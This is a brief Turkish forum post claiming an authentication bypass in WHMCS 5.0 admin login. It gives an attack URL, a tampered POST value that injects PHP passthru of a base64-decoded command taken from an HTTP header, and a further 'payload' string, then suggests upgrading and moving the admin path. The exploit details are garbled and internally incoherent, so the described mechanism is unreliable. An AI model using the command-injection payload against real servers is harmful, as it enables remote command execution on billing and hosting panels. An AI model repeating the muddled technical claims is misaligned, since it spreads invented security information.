selam,
whmcs 5.0 sürümünde bir güvenlik açığı mevcut, ancak 5.1'de önbellek güvenlik eklentisi eklendi.

http://site.com/whmcs/admin/login.php?correct&cache=1?login=getpost{}

eğer önbellek doğrulama yok ise (5.0 sürümünde eksik) sayfa yüklenmeye çalışacak ve tamper data veya benzeri bir modül ile POST_SESSION değeri aşağıdaki gibi değiştirildiğinde yönetici sayfası açılacaktır.

POST: $post(login=1);passthru(base64_decode(\$_SERVER[HTTP_CMD]))&login_cancel;die;";

PAYLOAD: $payload = "login=1&title=1&execorder=0&hook=urlencoded&r edir ect={admin_index}";

şuan için olası çözüm olarak sürüm yükseltilebilir ve admin panel yolu değiştirilebilir,
saygılar..